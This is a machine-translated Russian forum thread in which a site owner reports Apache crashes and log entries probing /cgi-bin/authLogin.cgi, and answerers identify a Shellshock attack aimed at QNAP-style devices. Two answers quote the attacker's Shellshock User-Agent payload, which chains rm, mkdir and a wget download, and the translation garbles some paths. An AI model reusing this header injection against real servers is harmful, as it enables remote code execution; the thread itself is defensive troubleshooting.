Сервер Apache http перестал работать

Привет, друзья,

Я использую сервер Ampps с php 5.3.29 в центре данных сервера Windows.

к сожалению, я получаю следующее приглашение на сервере Windows и мой сайт не работает.

Заголовок подсказки:
Майкрософт Виндоус

Быстрое сообщение:
Сервер Apache http перестал работать.

Из-за проблемы программа перестала работать правильно. Windows закроет программу и уведомит вас, если решение доступно.

Трассировка:

При отслеживании ошибок и журналов доступа я обнаружил следующие журналы как причину.

В журнале доступа Apache:

202.175.83.36 — — [10 / Dec / 2014: 05: 58: 50 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
217.248.177.30 — — [10 / Dec / 2014: 06: 11: 24 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
209.153.244.6 — — [10 / Dec / 2014: 07: 09: 17 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335
81.214.132.245 — — [10 / Dec / 2014: 07: 25: 04 -0500] «GET /cgi-bin/authLogin.cgi HTTP / 1.1» 404 1335

В журнале ошибок Apache:

[Ср. 10 07: 25: 04.401073 2014] [cgi: error] [pid 2908: tid 1168] [клиент 81.214.132.245:36246] сценарий не найден или не может выполнить статистику: D: / Program Files / Ampps / www / cgi -bin / authLogin.cgi

Пожалуйста, помогите мне.

1

Решение

Есть веб-бот, пытающийся получить полномочия, чтобы он мог wget и выполнить что-то вроде S0.py, который, как я думаю, является червем, поэтому сервер загрузки скомпрометирован.
Я хотел бы получить копию S0.sh, если вы случайно ее получили, и дайте ей использовать exploit-db или что-то в этом роде.
Умная команда:
Получить /cgi-bin/authLogin.cgi HTTP / 1.1.Host: 127.0.0.1. User-Agent :() {:; }; / bin / rm -rf /tmp/S0.sh && / bin / mkdir -p /share/HDB_DATA/…/php && / USR / бен / Wget

Файл выполняется после загрузки.
Полагаю, в HDB_DATA есть что-то, чего у меня даже нет.
«Информация имеет первостепенное значение!»

1

Другие решения

Если вы попытаетесь открыть этот файл, что произойдет?

D: / Program Files / Ampps / www / cgi-bin / authLogin.cgi

Сообщение указывает, что файл не существует, на что указывает ошибка 404 и сообщение «скрипт не найден».

0

Наконец, я запретил этим клиентам доступ к каталогу cgi-bin.

в каталоге cgi-bin я создал файл .htaccess

Я добавил следующую строку в .htaccess

Отрицать все.

0

Я не думаю, что authLogin.cgi действительно имеет значение, кроме того, что он может позволить кому-то выполнить. Проблема в том, что пользователь пытается или успешно удаляет /tmp/S0.sh и создает каталог php в папке общего доступа, а затем выполняет wget.

/ bin / rm -rf /tmp/S0.sh && / bin / mkdir -p /share/HDB_DATA/…/php && / USR / бен / Wget

Вот что пришло в голову после всего этого времени удивления:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

«S0.sh состоит из двух основных частей … первая часть выполняет начальную настройку и загружает дополнительные программы, а затем вторая часть устанавливает червя и выполняет некоторые дополнительные команды».

Так что ловить это действие было настоящим праздником, и поначалу никто не знал, что это Шеллшок. Там есть копия S0.sh, и вы можете видеть, что это червь, как я и предполагал.

Из того, что я прочитал, червь просто просматривает пространство IP в поисках любого, кто слушает порт 8080.

0